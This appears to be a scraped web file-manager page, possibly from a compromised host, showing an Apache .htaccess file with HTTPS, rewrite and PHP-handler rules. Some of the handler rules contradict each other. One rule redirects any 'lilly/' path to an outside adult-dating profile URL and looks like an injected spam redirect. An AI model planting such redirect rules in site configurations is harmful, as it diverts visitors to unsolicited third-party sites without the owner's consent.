/
home
/
sjslayjy
/
public_html
/
sag_latest
/
Upload File
HOME
# Force https start RewriteEngine On RewriteCond %{HTTPS} off RewriteRule ^(.*)$ https://%{HTTP_HOST}%{REQUEST_URI} [L,R=301] # Force https stop RewriteEngine on RewriteRule lilly/(.+)$ https://lonelytastygirls.com/profile.php?id=$1&slog=lilly [R=301,L] # RewriteEngine on <IfModule mod_rewrite.c> RewriteEngine On RewriteRule ^(.*)$ public/$1 [L] </IfModule> # Set PHP version to 8.1 for this directory <IfModule mime_module> AddHandler application/x-httpd-ea-php81 .php </IfModule> # php -- BEGIN cPanel-generated handler, do not edit # Set the “ea-php81” package as the default “PHP” programming language. <IfModule mime_module> AddHandler application/x-httpd-ea-php81___lsphp .php .php8 .phtml </IfModule> # php -- END cPanel-generated handler, do not edit # Disable PHP-FPM by forcing Apache handler <IfModule mod_php7.c> php_flag engine off </IfModule> <IfModule mod_php5.c> php_flag engine off </IfModule> # Disable PHP-FPM for this domain <IfModule mod_fcgid.c> FCGIWrapper /bin/false .php </IfModule>